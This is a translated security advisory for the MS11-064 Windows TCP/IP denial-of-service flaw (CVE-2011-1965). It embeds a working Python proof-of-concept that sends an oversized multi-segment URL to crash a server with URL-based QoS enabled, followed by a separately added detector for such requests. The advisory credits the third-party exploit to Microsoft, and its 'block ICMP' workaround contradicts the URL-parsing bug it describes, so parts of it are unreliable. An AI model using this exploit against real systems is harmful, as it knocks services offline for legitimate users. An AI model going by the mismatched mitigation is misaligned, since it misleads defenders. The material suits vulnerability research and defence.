Microsoft Windows TCP/IP QoS Remote Denial of Service Vulnerability (MS11-064)

Release date: 2011-08-09
Update date: 2011-08-09

Affected systems:
Microsoft Vista
Microsoft Server 2008
Microsoft Windows 7

Description:
BUGTRAQ ID: 48990
CVE(CAN) ID: CVE-2011-1965

Microsoft Windows is a very popular operating system published by Microsoft.

Microsoft Windows has a remote denial-of-service vulnerability in its implementation. A remote attacker can exploit it to restart the affected system, denying service to legitimate users.

The TCP/IP stack (Tcpip.sys) contains an error in its URL parsing. A specially crafted URL request submitted to a web server that has URL-based QoS enabled can cause the system to stop responding or restart.

<*Source: Microsoft
  
  Link: http://www.microsoft.com/technet/security/bulletin/MS11-064.mspx
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!

Microsoft provided the following test method:

http://www.exploit-db.com/download/17981

# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965

# analysis is available -
# http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/

------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import socket

HOST = "localhost"  # yeah, we've tried this as a local kernel exploit -:)
PORT = 80


def tryOnce(i, j):
    # Build a request path of i segments of 0x100 "a" characters,
    # followed by one final segment of j "b" characters.
    print(hex(i), hex(j))
    filename = ["a" * 0x100 for x in range(i)]

    filename = "/".join(filename)
    filename += "/" + "b" * j
    print("filename len : ", hex(len(filename)))

    hostname = "www.darungrim.org"

    # The bare LF line endings and the missing HTTP version are kept as in
    # the original PoC; they are part of the request it sends.
    header = "GET /%s\n" % filename
    header += "HOST: %s\n\n\n" % hostname

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send(header.encode("ascii"))  # Python 3 sockets send bytes, not str
    response = s.recv(1024)
    s.close()
    print(response)
    return


if __name__ == '__main__':
    tryOnce(0x3c, 0x7)
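As an added defensive example (not part of the original advisory or of the exploit author's code): a small detector that flags HTTP request lines shaped like the PoC above, a path of very many segments and many kilobytes in length. The thresholds and the sample request lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Heuristic thresholds. These are assumptions chosen to sit well below the
# PoC above, which sends 0x3c segments of 0x100 bytes each (about 15 KB).
MAX_PATH_BYTES = 4096
MAX_SEGMENTS = 32

# The PoC omits the HTTP version, so the version is optional here.
REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+HTTP/\d\.\d)?$")


def analyze_request_line(line):
    """Return the reasons a request line matches the long-URL pattern;
    an empty list means nothing suspicious was found."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return ["unparseable"]
    path = urlsplit(m.group("target")).path  # drop query string and host
    segments = [seg for seg in path.split("/") if seg]
    reasons = []
    if len(path) > MAX_PATH_BYTES:
        reasons.append("long_path")
    if len(segments) > MAX_SEGMENTS:
        reasons.append("many_segments")
    return reasons


def scan_requests(lines):
    """Map the index of every suspicious request line to its reasons."""
    flagged = {}
    for idx, line in enumerate(lines):
        reasons = analyze_request_line(line)
        if reasons:
            flagged[idx] = reasons
    return flagged


# Constructed sample input: ordinary requests plus one built the way the
# PoC builds its path (0x3c segments of "a" * 0x100, then "b" * 7).
POC_PATH = "/" + "/".join(["a" * 0x100] * 0x3c) + "/" + "b" * 7
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /static/css/site.css?v=3 HTTP/1.1",
    "GET %s" % POC_PATH,
    "GET /a/b/c/d HTTP/1.0",
]

if __name__ == "__main__":
    for idx, reasons in scan_requests(SAMPLE_REQUESTS).items():
        print("request %d flagged: %s" % (idx, ", ".join(reasons)))
```

The same check can be applied to the request field of web-server access logs or placed in front of a server that has URL-based QoS enabled.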

Recommendations:
Temporary workaround:

* Block ICMP at the firewall

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS11-064) and the corresponding patch for this issue:

MS11-064: Vulnerabilities in TCP/IP Stack Could Allow Denial of Service (2563894)

Link: http://www.microsoft.com/technet/security/bulletin/MS11-064.mspx

This vulnerability notice was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.